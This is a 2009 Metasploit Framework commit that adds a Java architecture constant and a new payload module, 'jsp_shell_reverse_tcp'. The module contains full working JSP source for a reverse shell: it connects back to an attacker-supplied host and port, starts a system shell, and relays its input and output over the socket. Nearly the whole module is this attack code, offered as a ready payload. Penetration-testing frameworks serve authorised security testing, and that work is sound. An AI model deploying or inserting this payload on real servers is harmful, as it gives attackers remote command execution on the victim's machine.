add java payload jsp_shell_reverse_tcp.

git-svn-id: file:///home/svn/framework3/trunk@7071 4d416f70-5f16-0410-b530-b9f4589650da
2009-09-27 18:35:07 +00:00 · 2009-09-27 18:35:07 +00:00 · 1a220d6dc5
parent 5be5a20ba7
commit 1a220d6dc5
2 changed files with 114 additions and 1 deletions
--- a/lib/rex/constants.rb
+++ b/lib/rex/constants.rb
@ -80,6 +80,7 @@ ARCH_PHP    = 'php'
 ARCH_TTY    = 'tty'
 ARCH_ARMLE  = 'armle'
 ARCH_ARMBE  = 'armbe'
+ARCH_JAVA   = 'java'
 ARCH_TYPES  =
 	[
 		ARCH_X86,
@ -96,7 +97,8 @@ ARCH_TYPES  =
 		ARCH_ARMBE,
 		ARCH_CMD,
 		ARCH_PHP,
-		ARCH_TTY
+		ARCH_TTY,
+		ARCH_JAVA
 	]

 ARCH_ALL = ARCH_TYPES
--- a/modules/payloads/singles/java/jsp_shell_reverse_tcp.rb
+++ b/modules/payloads/singles/java/jsp_shell_reverse_tcp.rb
@ -0,0 +1,111 @@
+##
+# $Id$
+##
+
+##
+# Thin file in part of the Metasploit Framework and may be subject to 
+# redintribution and commercial restrictions. Please see the Metasploit
+# Framework web site for more information on licensing and terms of use.
+# http://metasploit.com/framework/
+##
+
+
+require 'msf/core'
+require 'msf/core/handler/reverse_tcp'
+
+
+module Metasploit3
+
+	include Msf::Payload::Single
+
+	def initialize(info = {})
+		super(merge_info(info,
+			'Name'          => 'Java JSP Command Shell, Reverse TCP Inline',
+			'Version'       => '$Revision$',
+			'Description'   => 'Connect back to attacker and spawn a command shell',
+			'Author'        => [ 'sf' ],
+			'License'       => MSF_LICENSE,
+			'Platform'      => [ 'win', 'osx', 'linux', 'unix', 'solaris' ],
+			'Arch'          => ARCH_JAVA,
+			'Handler'       => Msf::Handler::ReverseTcp,
+			'Session'       => Msf::Sessions::CommandShell,
+			'Payload'       =>
+				{
+					'Offsets' => { },
+					'Payload' => ''
+				}
+			))
+		register_options( [ OptString.new( 'SHELL', [ true, "The system shell to use.", 'cmd.exe' ]), ], self.class )
+	end
+	
+
+	def generate
+		# JSP Reverse Shell modified from: http://www.security.org.sg/code/jspreverse.html
+		jsp = %q{
+			<%@page import="java.lang.*"%>
+			<%@page import="java.util.*"%>
+			<%@page import="java.io.*"%>
+			<%@page import="java.net.*"%>
+
+			<%
+				class StreamConnector extends Thread
+				{
+					InputStream is;
+					OutputStream os;
+					  
+					StreamConnector( InputStream is, OutputStream os )
+					{
+						this.is = is;
+						this.os = os;
+					}
+							  
+					public void run()
+					{
+						BufferedReader in  = null;
+						BufferedWriter out = null;
+						try
+						{
+							in  = new BufferedReader( new InputStreamReader( this.is ) );
+							out = new BufferedWriter( new OutputStreamWriter( this.os ) );
+							char buffer[] = new char[8192];
+							int length;
+							while( ( length = in.read( buffer, 0, buffer.length ) ) > 0 )
+							{
+								out.write( buffer, 0, length );
+								out.flush();
+							}
+						} catch( Exception e ){}
+						try
+						{
+							if( in != null )
+								in.close();
+							if( out != null )
+								out.close();
+						} catch( Exception e ){}
+					}
+				}
+
+				try
+				{
+					Socket socket = new Socket( "LHOST", LPORT );
+					Process process = Runtime.getRuntime().exec( "SHELL" );
+					( new StreamConnector( process.getInputStream(), socket.getOutputStream() ) ).start();
+					( new StreamConnector( socket.getInputStream(), process.getOutputStream() ) ).start();
+				} catch( Exception e ) {}
+			%>
+		}
+		
+		if( !datastore['LHOST'] or datastore['LHOST'].empty? )
+			return super
+		end
+		
+		jsp = jsp.gsub( "LHOST", datastore['LHOST'] )
+		
+		jsp = jsp.gsub( "LPORT", datastore['LPORT'].to_s )
+		
+		jsp = jsp.gsub( "SHELL", datastore['SHELL'] )
+		
+		return super + jsp
+	end
+
+end